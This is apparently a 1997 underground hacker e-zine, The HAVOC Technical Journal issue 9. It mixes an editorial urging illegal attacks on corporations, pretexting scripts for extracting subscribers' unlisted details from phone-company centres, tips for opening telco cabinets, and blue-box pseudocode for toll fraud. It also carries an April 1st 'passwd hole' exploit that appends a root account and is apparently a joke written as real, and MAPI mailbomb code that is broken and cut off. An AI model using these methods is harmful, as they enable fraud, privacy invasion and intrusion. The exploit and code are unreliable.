ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³The HAVOC Technical Journal ³± ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± Vol. 1 | No.9 | April 1st, 1997 | A HAVOC Bell Systems Publication "In /dev/null no one can hear you scream." - Redtyde _____________________________________________________________________________ --=[The HAVOC Technical Journal Issue 9]=-- Editorial..............................KungFuFox Social Engineering Your RBOC...........KaiserS Subscriber Loop Concentrators..........Optimus News passwd hole.......................Scud-O International Software Blueboxing......memor TEMPEST................................Optimus MAPI Mailbombing Part I................Scud-O FCC Frequency Allocations..............Keystroke 1aESS..................................Optimus X-Toolz................................lurk3r TFTP...................................Scud-O The News...............................KungFuFox Reader Survey..........................THTJ IRC Logs...............................Undernet Phonecalls.............................THTJ "The internet is the antithesis of control. It redistributes power and undermines control." -Jon Katz, The Netizen _____________________________________________________________ The HAVOC Technical Journal - Information - Editor in Chief : Scud-O, foxmulder@worldnet.att.net - Acting Editor: KungFuFox, mazer@cycat.com - Submissions Editor: Keystroke, keystroke@thepentagon.com - THTJ email address: thtj@juno.com - THTJ website: www.geocities.com/siliconvalley/8805 - THTJ mailing address: PO BOX 448 Sykesville, MD 21784 The HAVOC Technical Journal Vol. 1, No.9, April 1st, 1997. A HAVOC Bell Systems Publication. Contents Copyright (©) 1997 HAVOC Bell Systems Publishing. All Rights Reserved. No part of this publication may be reproduced in whole or in part without the expressed written consent of HAVOC Bell Systems Publishing. [No copying THTJ, damnit.] The HAVOC Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities. [Actually, to tell you the honest to goodness truth, we do endorse that stuff. We just don't wanna get in trouble if you try it for yourself and something goes wrong.] "We're building a wired world, but all those wires are crossed. We've had a lot of warnings. Pretty soon, we're going to start having disasters. It's time we started looking harder at the threats." -Simson Garfinkel, Wired Magazine _____________________________________________________________ --------------- --=[Editorial]=-- Written by KungFuFox --------------- When I think about the electronic underground out there, about the warez traders, the phreaks, hackers, crackers, anarchists, and all the others, I see a buncha people who enjoy what they're doing, with good reason. You all have your reasons for residing in the underground community, even if they're really naughty reasons. One thing that all of you share [besides 0-day warez, k0dez, toenz, phone numbers, card numbers, payphones, toilets, hotel rooms,... er, I'm getting off track here] is what I'll call the big picture; it's us against them. Right about now, you're probably thinking that I'm nuttier than a payday candybar, or you may be wanting to know who 'they' are. Yes, I am nuttier, but anyways, that 'us against them' thing is an old cliche, but I'm not a genius so I used it. This simple equation should adequately illustrate who 'they' are: they = evil corporations in the sky. For me, the word corporation conjures up images of an old man sitting at a big desk on the top floor of a skyscraper. He's probably staring at some newspaper's stocks & bonds page, and laughing at all the profits that his big evil corporation is raking in, but my imagination isn't that vivid, so I can't be sure what he's doing, maybe he's molesting a napkin, I don't know. Back to my story... That old man isn't interested in how good the customers feel about his corporation's products, and that's not just because he's old, lots of middle aged people have the same problem he's got, and it can't be cured by a 12 step program, like alzhiemers or redbox addiction. His problem is greed, and it's cost him his status as a philanthropist, but who really cares? *WARNING* [If you are a faint hearted retard, the below statement may be lethal. All personal injury claims may be sent to Bell Communications Research Inc., Courtesy of HAVOC Bell Systems, 445 South Street, Morristown, NJ, 07960.] The corporate world of the 20th century isn't about ethics, not good business, it's all about money. [shocking!] There aren't any real political empires out there anymore, because imperialism was deemed unethical by the United States, and we're all well aware that the United States is the most ethical place in the world, right? So naturally something has got to replace the power that political empires used to have, and voila; we get corporate imperialism. If you can't control things with an army, why not just take over wide areas of the economy by owning and producing everything that people buy? Is that what YOU were thinking? Right! So the old man's army of accountants, and marketers, and productions staff, and jackoffs, and asshole managers, and expert lawyers, and enslaved mexican laborers are all set to work building this empire that that old man wants so bad. It's not as simple as that, but I just recently found out that not all of our readers are economists, which really bummed me out. What has replaced political imperialism is corporate imperialism, and instead of soldiers being sacrificed in the name of territorial expansion, it's consumers being sacrificed in the name of higher profits. Now being the noble protectors of consumer freedom that we members of the electronic underground are, we've got to do something, right? Well little do you know, you've probably already helped the cause. All attempts at conquering a group of people, may they be military or economic, are met with resistance, and we are that resistance. We each play an important role in this war against corporate imperialism, and we all contribute to the well being of our fellow electronic citizen, whether we realise it, or not. The warez traders slow unfair software company profiteering. Phreaks bypass the ridiculous pricing system of the phone company. Hackers free information for the electronic community. Crackers break down the walls that have been erected for the purpose of profit. And anarchists keep corporations from going about their business as usual. It isn't about who wins or loses, it's how you play the game, right? Well upsetting as it may be, the corporations are cheating, and winning. We are the liberators, the equalizers in a society polarized by gluttonous profiteering. Without us, the world would not be a better place, it could only be worse, and things would basically suck. If you phear the media, because they said we're bad guys, pay close attention: the media is owned by corporations, so they say what that old man at the top of the skyscraper wants them to say. Nothing you see on the news is pure unadulterated goods, because that wouldn't be prudent. Well, the real reason isn't about prudence, I made that up. It IS about making certain aspects of life look good, and others look bad. That's why that old man always makes himself look swell, and blames us evil hacker types for ruining his honest business practices. Unbelievable as it may be, they phear us. We're what stands in the way of infinite profits, and wouldn't you know it, that pisses them off. They phear because they don't know who we are, unless they're luck enough to catch us, which isn't as often as it may seem. None of those old men, or anyone that works for them, will ever meet you, or know your real names, and yet you are pheared. The next time you're hacking a shell, or phreaking your grandma, or insulting an OCI operator, or just tradin' some warez, think about who you're hurting, it's not the little guys, they don't have to pay the bills if they don't want to; it's that evil old man. If you have a moral problem hurting old men, just replace the words 'old man' with your favorite corporate executive. I've provided a few examples: Steve Case, Bill Gates, Michael Eisner, or even Bill Clinton, since he rips us off anyway. This editorial is a reminder for those of you who may feel wary of breaking the law, or doing something 'wrong'. Nothing you do is wrong, so long as it's not against a moral opponent, or some innocent bystander who didn't piss you off or give you a good reason like 'he looked stupid'. At least justify it, so when the judge asks you what the hell you were thinking when you pranked the mayor at 3am and insulted his wife's obesity, you can tell him that you were just trying to offer some constructive criticism. At the same time, you shouldn't feel as though the hacker devil will strike you down if you don't help out the cause and fight corporations or something, because that's not why you got into H/P/C/V/A in the first place. You got into it because it was fun, or a challenge, or some other real creative reason. Maybe you wanted to go somewhere that you weren't supposed to go, or maybe it was just about taking risks (and not getting caught). Don't hesitate to admit you don't give a shit about the big picture, because the big picture is boring and stupid, and you just want k0dez, right? I'll end this by thanking Scud-O for giving me the opportunity to edit this magazine, and may it live long and prosper. To all of you readers, hopefully you'll come out of this experience with some info that you can use in all of your underground adventures, and maybe you'll enjoy reading it at the same time. [If you haven't noticed already, I made a few format changes, so don't panic... this is the same magazine.] All questions, comments, and good stories may be emailed to me at: mazer@cycat.com "...there is no scenario that I can see where a system-wide failure of networks would occur due to the internet." -Tim Harmsen, CEO of Digital Vision Communications _____________________________________________________________ ---------------------------------- --=[Social Engineering Your RBOC]=-- Written by KaiserS ---------------------------------- There are several areas that can be included, or described as "phreaking", in this article, I will discuss some basics of social engineering, perhaps one of the best ways to accomplish large tasks in a small amount of time (without hacking, and jailtime). For those of you who do not know what social engineering is, let me give you a brief rundown... Social engineering involves taking on the identity of, in this case a bell employee, in order to make yourself appear to be an inside bell employee, and get information that is not publicly available, or, in extreme cases, add/move/change service, or disconnect service altogether. One of the best things to have when you begin is not knowledge, but rather, a deep radio voice...you need to sound like you are "ON AIR" (it makes the bell ladies that work the desk jobs swoon).... Well...enough with the intro... Social engineering unlisted name/address info from a telephone number only, or, the unlisted telephone number from name and address. FIRST! You need to have a technical number like the ICSC/ICMC, call information, and ask for REPAIR...then call repair, and say that you have a private line circuit that is down, and you need the IC repair number... Once you have that number, you are homefree! Call the IC Repair number, and act like you have reached the wrong number: Hello? what center have I reached?? The interexchange carrier maintenance center (ICMC) OH! I am sorry, would you please transfer me to MLAC, or the LDMC, and give me the number before you do in case I drop off. Sure, (searching through a phonelist) (they may have it listed under FACS) I cant find it... Well, I need to speak to someone who works FACS, or PREMIS Ah, here it is... I will not be giving out those numbers in this article...if you cannot get this far...well:) Once you have MLAC, or the LDMC... Call them! Getting unlisted address/name info from a telephone number... Hi, this is Dan (any name) at the frame of the ANYTOWN01 (usually it will be "the town the # is in", and "01, 02, 03, 11, or, 12, i.e., Garrison11) I need you to go into FACS, and pull 200 555-1234 OK, what do you need? can you pull the address, and binding post information?? Sure... she will give you the address, and several long, hyphenated numbers...these designate where the pair s located in the terminal (b-box) Great, do you have SORD?? Yes. Can you pull the subscriber name? Yes, I see it listed as : Joe Blow...or whatever:) thank you, have a good day. Getting unlisted number/numbers from an address... Call MLAC again... Hi, this is Dan (any name) at the frame of the ANYTOWN01 I need you to go into PREMIS, and pull 123 Main Street, Anytown USA. OK, what information do you need? I need all lines terminated at that PREM LOC. OK, I see two lines terminated there, they are...(she will give you the telephone numbers) Thank you, and have a good day... Now, I will explain some of the terminology I used: MLAC = Mechanized Loop Assignment Center LDMC = Loop Distribution and Maintenance Center (same as MLAC) FACS = Facilities Administration Computer System PREMIS = Doesn't have a neat acro (that I know of) Maintains records by premises info SORD = Service ORDer system Well, that's it for this writing...hope this can be put to good use, as this is one of the best ways to start out, there are many other thing (neat tricks) that can be accomplished through these same centers, but this is a start, and will be quite an asset. _____________________________________________________________ ----------------------------------- --=[Subscriber Loop Concentrators]=-- Written by Optimus ----------------------------------- The Universal SLC (Subscriber loop concentrator) has two main parts, the Central Office Terminal (COT) and the Remote Terminal (RT) commonly connected by a t1 digital line or optical fiber connection. The COT and RT are composed of four shelves labeled alphabetically. Each shelf has twenty-four channels. In an intergrated SLC system, the COT is replaced by the Digital Carrier Line Unit (DCLU) in a 5ess or similar switch. A SLC with a Feature Package B (FPB) can interface to a SLC COT, DCLU, Subscriber Loop Interface Module (SLIM) and a LM12 Multiplex. The most comman SLC system is there Series 5. The series 5 is based on two independant 96-line systems that are packaged into one 5 shelf, dual bank assembely. The Bank Control Unit (BCU) and Alarm Display Unit (ADU) monitor for system failures within the SLC system, and its interface. If someone goes wrong on either end, the other end is notified via the Alarm Interface Unit (AIU). An important thing to mention is that many SLC systems have an alarm function called DLR ALM, which was conveinently spelled out on a 51a SLC for me as a Door Alarm. The particular 51a had a small round piece of metal protruding from the upper right hand corner, which would be held in when the door was closed and consequently pop out when the door opened. After 30 seconds of this metal being out, the DLR ALM light would light. This is undocumented in all of the many SLC related manuals I have in my possesion, but from logic, when tripped, the ADU on the COT or related interface at the CO is probably notified. SLC's are fairly easy to spot, usually stored in a 51a, 80d or 80e cabinets, or frame mounted within a 16 or 24 foot CEV (Controlled Environment Vault), PCH (Pre-cast Concrete Hut) or inside a customer's location. The 51a is usually a slate or gray colored cabinet mounted off the ground on either a pole or a pedestal. The 51a has two sections that open. The front section, the Electronics Section, contains the power shelf, fan unit, one dual channel bank which I mentioned earlier (allowing up to 192 subscriber loops (pots)) and the protection panel (following the phone companys usually standard of high power protection). The ADU device is usually either a card mounted in the Channel Bank or a seperate unit place on top of the fan or power shelfs. The back section, the Battery Section, contains power backup equipment and battery's to keep the SLC running in case its direct power connection fails or the area has a blackout. These sections are designed to only be opened with a common allen wrench with a hole drilled down the middle of it, but can commonly be opened with a good pair of needle-nose pliers. The 80D RT housing is more slender but wider then the 51a usually a dark brown color with a white frame. The size of the 80D allows most areas to be reacher from either the front or the back. The exception to this is on the front you have access to the AC power panel and outlets. Oppisite these on the back is the main splice for your cabling, a sort of miniature cable vault. It is common to find these equipped with a fiber feed, which replaces a channel bank on the back with a fiber mulitplexer allowing only three dual channel banks supporting 576 subscriber loops (pots). When not equipped with a multiplexer, the 80D contains 4 dual channel banks (768 subscriber loops (pots)). I have never opened a 80D, but have been told it takes one of the two basic telco keys, a 3/8ths or a 5/16ths hex driver (found on a Can/Cam wrench). 80D's are always PAD mounted. The 80E is basically an extra large 80D, allowing 8 dual channel banks, supporting 1536 subscriber loops (pots) unless fed by a fiber link which, as in the 80D, replaces a dual channel bank with a multiplexer which I would believe should be the feed of choice for every installation of this system. I've never seen one of these, but they must be pretty badass from what I've read about them. These are also capable of containing t1 repeater shelves for t1 extensions. The 80E is also pad mounted. The battery compartment on the 80E is kept on the very bottom of the unit. The front and back of the 80E are divided into four columns. The front left side contains the AC interface, as the back left side is as general in 80 SLC's the splicing area. The rest of the back of the 80E is dual channel banks with the exception of an unknown device in the upper right hand corner. Probably relating to the lightguide equipment opposite it. The two middle columns on the front of the 80E contain two dual channel units and the ringing, rectifier and other misc shelfs. The right column on the front is where the lightguide (fiber optic feed) equipment is kept when using a fiber feed, or another dual channel bank if not. If you ever get into a CEV or a PCH, the SLC system is arranged much the same, just to a larger extent. The PCH's will usually contain 30, 36 or 40 dual channel banks, depending on the PCH size and the type of feed. The CEV's will usually contain 20, 24, 30 or 36 dual channel units depending on the same specifications. I have more information on other SLC cards and systems if you need something specific. This information will hopefully give you a general idea of what these boxes you see on the sides of the road are and what they do. Basic Data Encoding The simplest form of the data transfer method on a digital line is a bit. A bit is either a zero or a one, zero being off and one being on. Eight bits are comprised into a byte. One byte represents a single digital character. An example is the letter "A", which in binary would be "01000001". A T1 digital line (also knows as a 1.5, T-1, T-Span, T-Line, DS-1) is a digital line capable of transmitting voice, data, video and computer information at a rate of 1,544,000 Bits Per Second (BPS) (1.544 Mbps). A pulse (also known as a one or a mark) is the electrical postive or negative signal sent across a digital line. A No Pulse (also known as a zero or a space) is there is no electrical signal present on the digital line. A Bi-Polar Return To Zero (RZ) also called an AMI, is one of the simplest protocols for a T1 line. The electronic signal blips into a postive or negative charge, both representing a transmission pulse. Between each 'blip' the signal returns to zero voltage for a short period of time, not being long enough to be recongized as a Non Pulse Bit (NPB). If the signal stays at zero through the allotted time slot, it is then recognized as a NPB transmission. A logic error or a bit error is when a bit is transmitted in one position and recieved in another. For example a one is received where are zero was sent. This is common, and brought one the creation of crc checking for the digital line. A Bi-Polar Violation (BPV) is when two ones are transmitted consecutively on the same side of a zero. Simply put, it is when two positive or negative ones are received one after the other, when under normal circumstances, the bits would alternate polarity. After one-hundered and ninety-two prior bits are sent across the twenty-four channels of a T1, a framing bit is sent, making it the one-hundred and ninety-third bit. This is used to identify the end of a bit segment. So if each of the twenty-four channels send eight bits, making a one-hundred multiplied by 8000 (the approximate number segments sent per second) gives us 1,544,000 bps, our T1 line. B8ZS - Binary Eight Digit Zeroes Substitution. B8ZS allows a T1 subscriber to follow T1 Tariff requirements which do not allow fifteen consecetive zero bits. B8ZS takes a full 0 byte and changes it to look like "000+-0-+" which would be "0011011" without polarity. Customer Service Unit (CSU) - Equipemnt connected at the customer end of a 1.5 circuit Channel Service Unit (CSU) - Save as above Network Interface Unit (NIU) - Placed on the customer end of a 1.5 circut to facilitate testing of the circut. D-4 Bank - A Multiplexer that combines 24 voice channels into a single digital output signal, 1.5mbps Extended Super Frame (ESF) - One quarter of the bits are used to frame a digital transmission. Digital Service Classifycations: DS0 - 64 kbps - 1 Voice Circut DS1/T1 - 1.544 mbps - 24 Voice Circuts DS1C/T1C - 3.152 mbps - 48 Voice Circuts DS2/T2 - 6.312 - 96 Voice Circuts DS3/T3/LT - 44.736 mbps - 4672 Voice Circuts DS3C/LW - 89.472 mbps - 1344 Voice Circuts DS4/LW - 274.176 mbps - 4032 Voice Circuts DS5/FT"G" - 1667 mbps - 24192 Voice Circuts Optimus _____________________________________________________________ ---------------------- --=[News passwd hole]=-- Written by Scud-O ---------------------- While setting up my news server, i was experimenting, and i have discovered a very huge hole that will be causing some sysadmins some sleepless nights. What follows below are the steps to not only read, but access and append any number of accounts to the /etc/passwd . 1. Set your NNTPSERVER environment variable usually, this is set to what ever you or your isp use as the news server, anyhow, change it to the localhost name so you are using the local server as news host. Ex: NNTPSERVER=news.digex.net ; export NNTPSERVER would go to NNTPSERVER=limbo ; export NNTPSERVER since limbo is my local host. or you can just modify the /etc/nntpserver if you want to be different 2. Create/ Modify your .newsrc file add the follwing 'newsgroup' to the file and keep it as the only one: /.etc.passwd 3. Either run trn -r of tin to read the 'news' Ex: tin -r tin 1.2 PL2 [UNIX] (c) Copyright 1991-93 Iain Lea. Connecting to limbo... Reading news active file... Reading attributes file... Reading newsgroups file ... --- etc ---- And you should see your password file, which each line being a different article. 4. Or, better yet, use trn and post an 'article' While you are running trn and reading a 'news' article, press f . it will then prompt you with: Are you starting an unrelated topic? [ynq] Well, type y , since otherwise you can REALLY mess up the passwd file! Next the news reader will prompt you for the subject and distribution Enter to following: Subject: ignore no reply Distrubution: na If you are wondering what the 'ignore no reply' is for, it is so that the server will not mail you back saying the message has been posted, which otherwise could point you out to the sysadmin if he views any logs! The distribution basically tells the servers that this is only to be sent to 'na' or North America, this line really doesnt matter, but nntp can and will be picky about this. Now trn will spit some stuff out at you and you should finnaly get to where it asks you which editor to use to edit the message, the default should be vi, and if it is not i would change it to vi, unless you wish to use another editor. Ex: Newsgroups: /.etc.passwd Subject: Summary: Expires: Sender: Followup-to: Distributuion: na Organization: Keywords: Cc: rewtbeer::0:1:i like rewt beer:/home/rewt:/bin/sh When you are finished typing this all in, save it with :wq . trn will then show you the name and and info about the 'newsgroup' you are sneding to: Your article's newsgroup: /etc.passwd Check spelling, Send, Abort, Edit, of List? s Type s to send out your article. trn will then return to the article you were reading. press q to exit and go login to your new shell! How it works: ^^^^^^^^^^^^^ Ok, not this may sound kind of crazy, but the nntp stores news in a standard directory pattern. This only makes sense, since this is the easiest way to do things. now, since you throw in the / in the newgroup, nntp moves from its regular directory to the root directory. Then with the 'etc' it moves to /etc and with the final 'passwd' nntp realizes that this is a file not a directory, and it opens it up for writing/reading/appending. So anyway, have fun, and next April 1st i hope you will look for my article on how the impending sale of Netscape to HAVOC Bell Systems may spell certain doom for Microslut. _____________________________________________________________ --------------------------------------- --=[International Software Blueboxing]=-- Written by memor --------------------------------------- When you don't have any technical skills in electronics, like you don't know how to calculate U=RI or when you think AC is Asynchronous Christians, you have to use a Software Bluebox... That program generates the well known 2600 Hz Tone, KP Tone (Key Pulse), ST Tone (Start) and the MF (Multi-Frequencies 700Hz-1100Hz) tones. 2600 Hz is normally the tone which makes the free call possible. It's a MF, composed of two frequencies during a lapse of time. The old and typical tone is.. Tone1 Frequency 1 = 2600Hz Frequency 2 = 2400Hz Length = 150ms Delay = 10ms Tone2 Frequency 1 = 2400Hz Frequency 2 = 2400Hz Length = 300ms Delay = 10ms After, you'll have to dial the KP-#Number-ST .. KP enables the MultiFrequency Receiver, ST is the tone that means the call is completed. Well, we never used to seize a french local phone number.. too dangerous, or when calling a french local phone number, we have to pay something. Like I can try to bluebox on (33) 0380293031 , trying to seize the phone line, with an old 2600Hz.. But when I dial and complete the call for some foreign country (B01xxxxxxxxxC) I will still pay the call... Me -> (33)0380293031 (an Average of 0.26FF/Min .. US$1==5FF) but well the (33)0380293031 will pay (33)0380293031 -> B01xxxxxxxxxC (a lot of $$) And the other problem is that (33)0380293031 is a Hospital, and the callers are logged.. France Telcom has enough equipment for using a Bluebox Fraud detection, and they use it for protecting French numbers against Fraud Attempts and for busting kiddie phreakers. So I personally use operators numbers, which are free for calling some CCS (calling card services) in USA, Japan, UK, Austria, Sweden, Finland,... (like the phone numbers I gave in bif2.txt) Well I have to scan for finding the 2600Hz tones.. It can be for example: Coloumbia CCS Tone1 Frequency 1 = 2650Hz Frequency 2 = 2450Hz Length = 170ms A delay between those 2 tones.. Delay = 10ms Tone2 Frequency 1 = 2450Hz Frequency 2 = 2350Hz Length = 330ms Delay = 10ms and after I dial the Kp-#Number-St dialing : B01219555555C and well i'll pay Me->Coloumbia CCS ... US$0 and Coloumbia CCS will pay Coloumbia CCS->B01219555555C ... a lot of $$ There is a little algorythm for scanning the 2600Hz ***************************************************************************** F1Interval1 is the Begin Frequencie1 \ Tone1 F2Interval1 is the Begin Frequencie2 / with Lenght1 F1AInterval1 is the Begin Frequencie1\ Tone2 F2AInterval1 is the Begin Frequencie2/ with Lenght3 F1Interval2 is the End Frequencie1 \ Tone1 F2Interval2 is the End Frequencie2 / with Lenght2 F1AInterval2 is the End Frequencie1\ Tone2 F2AInterval2 is the End Frequencie2/ with Lenght4 Delay is the delay between the 2 tones.. Default Value is 10ms, but u can still change it. ***************************************************************************** Procedure Scanning(F1interval1,F2interval1,F1interval2,F2interval2, Delay,F1AInterval1,F2AInterval1,F1AInterval2,F2AInterval2,Lenght1,Lenght2,Lenght3,Lenght4) Define F1interval1,F2interval2,F1AInterval1,F2AInterval1,Lenght1,Lenght2 Integer Define F1Ainterval2,F2AInterval2,Lenght3,Lenght4 Integer Define Delay Integer = 10 Define a,b,c,Testin,FirstCoolTone,SecondCoolTone,FirstCoolLenght,SecondCoolLenght Integer Define FirstCoolTone1,SecondCoolTone1 Integer /* It is the scan of the 1st Tone */ ask for &F1interval1,&F1interval2,&F2interval1,&F2interval2,&Lenght1,&Lenght2,&Delay a=F1interval1 c=F2interval1 a=a-1 c=c-1 while(c!=F2interval2 and Testin!=1) c=c+1 while(a!=F1interval2 and Testin!=1) a=a+1 b=Lenght1 while(b!=Lenght2 and Testin!=1) Sound(Voice1,b,a) Sound(Voice2,b,c) ask for a 1/0 in Testin /*is the Tone seems well.*/ b=b+1 EndWhile wait(Delay) EndWhile EndWhile FirstCoolTone=a FirstCoolTone1=c FirstCoolLenght=b Wait(Delay) Testin=0 /* It is the scan of the 2nd Tone */ ask for &F1Ainterval1,&F1Ainterval2,&F2Ainterval1,&F2Ainterval2,&Lenght3,&Lenght4,&Delay a=F1Ainterval1 c=F2Ainterval1 a=a-1 c=c-1 while(c!=F2Ainterval2 and Testin!=1) c=c+1 while(a!=F1Ainterval2 and Testin!=1) a=a+1 b=Lenght3 while(b!=Lenght4 and Testin!=1) Sound(Voice1,b,a) Sound(Voice2,b,c) ask for a 1/0 in Testin /*is the Tone seems well.*/ b=b+1 EndWhile wait(Delay) EndWhile EndWhile SecondCoolTone=a SecondCoolTone1=c SecondCoolLenght=b Wait(Delay) /*Display The Cools Tones And Time*/ Write(1st cool Tone.. F1: %FirstCoolTone f2: %FirstCoolTone1 lenght: %FirstCoolLenght) Write(2st cool Tone.. F1: %SecondCoolTone f2: %SecondCoolTone1 lenght: %SecondCoolLenght) End. ***************************************************************************** There is a little algorythm for seizing with 2600Hz ***************************************************************************** F11 is the Begin Frequencie1 \ Tone1 F21 is the Begin Frequencie2 / with Lenght1 F12 is the End Frequencie1 \ Tone1 F22 is the End Frequencie2 / with Lenght2 ***************************************************************************** Procedure Dialing(F11,F21,Lenght1,F12,F22,Lenght2,Delay) /* Dialing Procedure */ ClearScreen Write(Dialin') ask &F11,&F21,&Lenght1,&Delay,&F12,&F22,&Lenght2,&Delay /*1st Tone*/ Sound(Voice1,Lenght1,F11) Sound(Voice2,Lenght1,F21) /*Waitin Delay*/ Wait(Delay) /*2nd Tone*/ Sound(Voice1,Lenght2,F12) Sound(Voice2,Lenght2,F22) /*Waitin Delay*/ Wait(Delay) ***************************************************************************** How To Bluebox for connecting a network, using a modem. ------------------------------------------------------- In the first place, you must plug the PhonePlug and the ModemPlug like so.. ______ _____ _____ Wall | | | | | In/Out| /___|Modem| /____ |Phone| Phone | \¯¯¯|Plug | \¯¯¯¯ |Plug | Line | |_____| |_____| ¯¯¯¯¯¯ | | To The Computer.:' ':.To The Computer Speakers You must prepare your Software Bluebox and your fav Terminal in 2 tasks (Win3.1x,95,nt + DOS) Task1:Bluebeep.exe (Msdos (Alt+Tab) ) Task2:Term.exe (Win3.11) now.. prepare your modem: ATZ OK To catch the carrier when you'll have it, the command ATD will be cool, ATD is for dialing (D=Dialing) , but ATD alone catch the Modem Carrier. ATDT3336431515 <- Don't prepare that.. Wrong ATD <- Right String Switch the Task on the BlueBox system, Phone your operator number, seize, activate the multi-frequencies receiver with KP , Dial # number in MF , Call is completed with ST. When you heard the beep and the carrier Autoanswer of the targeted modem.. for example, call the 3615 Teletel French Network >> Dial : B03336431515C, switch the task on your fav terminal and press the Return.. ATZ OK ATD Connect 1200 ^A Teletel Network 3615 3614 3613 ^C Nom du service:.................................... _____________________________________________________________ ------------- --=[TEMPEST]=-- Written by Optimus ------------- For those of you who already know alot about tempest, skip this and email me all you know, otherwise, read on... TEMPEST stands for Transient Electromagnetic Pulse Standard. Tempest is a code name the government created to define their electromagnetic radiation protection program. The government still stands on the fact that Tempest monitoring does not exist although millions of dollars go towards this program and many people have proven it to be an actual threat. In 1985, Wim van Eck, a dutch scientist, published a paper concerning the threats of tempest eavesdropping. This paper caused stirring in many government agencies, and it was immediatly classified. Most tempest information remains classified to this day, not being allowed to anyone who is not a certified tempest security consultant. This is the cause for the scarce amount of information out there on tempest (sometimes known as van eck) monitoring. For a device to be TEMPEST certified, that is, approved that it does not let out any or a largely unsubstantial amount of Electromagnetic radiation, it must comply to NACSIM 5100A. This document happens to be classified by the NSA though so alot of good it does to the normal citizen. The basis behind TEMPEST is that everything emits electromagnetic charges. When the power level behind these charges changes, they emit electromagnetic pulses that transmit low level radio waves. The challenge is to pick up these radio waves and reconstruct them into a form readable and usable by the reciever. This is just a small tidbit of information on TEMPEST. Most of this information I've learned from TheCodex, a company providing information on surveilance and couter-survailence. You can find them on the web at http://www.thecodex.com. Optimus _____________________________________________________________ ----------------------------- --=[MAPI Mailbombing Part I]=-- Written by Scud-O ----------------------------- I. Introduction of MAPI ^^^^^^^^^^^^^^^^^^^^^^^^ Ever since Microslut released the MAPI for Win 3.1, Adding and sending mail to and from applications has been a breeze. And with Win95's integration of MAPI has only helped it. Just look at your windows 95 desktop, and you will see MicroSoft Exchange, probably the most popular mail program for w95. Microsoft has also made it a requirement for a program to have some form of MAPI to recieve a Windows 95 Logo. Anyway, MAPI stands for Messaging Applications Programming Interface. It is used by programmers to add basic, and advanced mail capabilities to a program, and MAPI is part of Microslut's Windows Open Services Architecture (WOSA), which is basically a set of common APIs for distributed computing. II. The MAPI APIs & Architecture ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ There are 3 main MAPI APIs. The first one, Simple MAPI, is the most commonly used api, and is the API we will mostly be using. The Common Messaging Calls API, (CMC) has also been developed as a platform independant replacement for MAPI (but so far i dont see the internet moving in hordes to apody it.) It contains about 10 basic calls for basic messaging. And finally, there is the big daddy of them all, The Extended MAPI. It is a large API with many calls that are still being developed, and are mainly for messaging only apps, like Exchange or a Mail Server. Figure I ^^^^^^^^ Basic MAPI Architechure Messaging Aware Apps Messaging Enabled Apps Messaging Based Apps ^ ^ ^ | | | +-------------------------------------------------------------------------+ | | | - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | | | Simple MAPI CMC Extended MAPI OLE Messaging | | | - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | | Messaging Subsystems | | +------------------------------------------------------------+ | | | Extended MAPI | | | +------------------------------------------------------------+ | +-------------------------------------------------------------------------+ | | | ^ ^ ^ Message Store Provider Address Book Transport Provider Provider Service Providers ^^^^^^^^^^^^^^^^^ The service providers are the components of MAPI that collectively implement MAPI service on a system. The three type are Message Stores, Address Book, and Transports. The Message Stores are the messages you have under an inbox for example. Just look at Exchange's or Netscape's inbox, and you are looking at a MAPI Message Store. ( Well the Exchange is probably a better example, since Netscape uses the Internet standards, while Exchange does MAPI, and internet.) The Address Book, is a gay little Microslut invention, that contains a list of recipents for messages. ( i say gay, because it is a retarded name.) And finally, the Transport providers are the link between a local system to the remote systems ( i.e. Internet) Simple MAPI ^^^^^^^^^^^ Ok, Simple MAPI is here to provide us with the functions to establish a MAPI session, perform messaging functions, and close down the connection. A list of MAPI Calls [================================================================] | Simple MAPI Call Description | |================================================================| | MAPILogon Log on to service | | MAPILogoff Log off from service | | MAPIFreeBuffer Free all allocated memory | | MAPISendMail Send a piece of mail | | MAPISendDocuments Send file(s) in a message | | MAPIFindNext Find Messages | | MAPIReadMail Get Messages | | MAPISaveMail Save Messages | | MAPIDeleteMail Delete Messages | | MAPIAddress ----\ | | MAPIDetails -----\ | | MAPIResolveName Addressing Specifics | |================================================================| The quickest and easiest way to use Simple MAPI is by using MAPISendDocuments . You can use this function to create a standard message with a file attachment ( or attachments). The following my not seem to useful now, but it is a building block for our next part of this infosheet. Anyway, the example simply embeds your autoexec.bat into a message. To compile : cl sendauto.c userlib32.lib Using MAPISendDocuments: // Wow look at me! - i'm sendauto.c #include #include LPMAPISENDDOCUMENTS lpfnMAPISendDocuments; void SendMsg( HWND hwnd) { (*lpfnMAPISendDocuments)((ULONG)hwnd, ";" "C:\\AUTOEXEC.BAT", "AUTOEXEC.BAT", 0); MessageBox(hwnd, "Message Sent", "" MB_OK); } LRESULT CALLBACK WndProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { switch(uMsg) { case WM_LBUTTONDOWN: SendMSG(hwnd); break; case WM_DESTROY: PostQuitMessage(0); break; default: return DefWindowProc(hwnd, uMsg, LPARAM lParam); } return 0; } int WINAPI WinMAin(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR d3, int nCmdShow) { MSG msg; HWND hwnd; WNDCLASS wndClass; HANDLE hMAPILib; hMAPILib = LoadLibrary("MAPI32.DLL"); lpfnMAPISendDocuments = (LPMAPISENDDOCUMENTS)GetProcAddress( hMAPILib, "MAPISendDocuments"); if (hPrevInstance == NULL) { memset(&wndClass, 0 , sizeof(wndClass)); wndClass.style = CS_HREDRAW | CS_VREDRAW; wndClass.lpfnWndProc = WndProc; wndClass.hInstance = hInstance; wndClass.hCursor = 